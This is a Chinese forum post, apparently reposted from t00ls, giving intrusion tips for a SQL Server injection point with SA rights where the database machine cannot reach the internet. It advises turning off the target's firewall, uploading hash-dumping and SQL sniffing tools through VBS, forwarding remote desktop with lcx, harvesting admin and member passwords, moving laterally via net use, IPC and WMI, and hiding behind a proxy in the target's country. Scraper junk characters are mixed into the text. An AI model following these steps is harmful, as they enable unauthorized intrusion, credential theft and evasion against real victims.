当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
, k! a% m$ {3 |+ ]- e6 e
# }+ |, `$ w ~: [4 r8 r3 ~" f3 w- z/ D3 e# |
5 W9 M! ?/ h/ Q0 Z* o% K
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
, Y' `5 ]( O6 A7 ]( H% `0 [ T& X' l W) \' y/ J2 k, [- @) E' ]2 H
- J' y$ w& u8 f5 s
一、DB机有公网IP.7 }' v- m7 D" p3 q/ T( f
8 ?; x% K9 x0 T1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.. A! j' U) I5 K& O
7 o4 F4 O0 ^9 ~" _- }& ~
& W1 e# A" \) t8 p/ S& c- U2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.% H1 I' p2 O5 w8 V! O
8 G' [ s8 R8 S, g
# w/ Y- G' p6 u3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
# K, {! l! y" i# G) X! p& a6 a: p0 L/ x( h# X
5 E3 D9 W. @& d! t1 Q- p
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.- N! m! g2 B. I1 t3 z7 u) a
8 J# e) A* I2 D0 c0 P! [& z4 D3 _
[, p. I- b6 S+ |# d! L( U) L
9 [4 b) a4 \% d+ M2 Q1 t6 ~二、DB机只有内网IP4 X1 p) ?$ y% l, c! D
4 m" m5 u$ |* t2 |$ e2 k9 O; E
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.7 s0 n3 e* Q. B, b, K" Z( J
# t6 ~" ~2 K# O1 o+ m
2 O$ G3 [! o0 |2:停掉防火墙和IP策略再从内往外扫描.
6 N: I' J- P4 W8 X( I* P, A/ W6 U) x$ t
$ g6 k& N) w1 h: Z3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的." P% p5 J: s9 n( R, ?7 t: ^
( ~; b- M4 V# A1 U3 c1 D: m
8 P+ Y8 m. a' @2 n" J/ Q4:学会密码规律分析往往会有惊喜.
. _# [3 u3 `, ]* _' ^# d) i( ]4 [/ w9 O( G0 n6 n
3 P1 a6 n9 a$ e* c# j) `8 H s
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
9 ^- \ j0 @- B5 X9 b
! y7 a1 }8 t) O2 k' d+ P; P
3 @) e7 i h s6 f; s有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |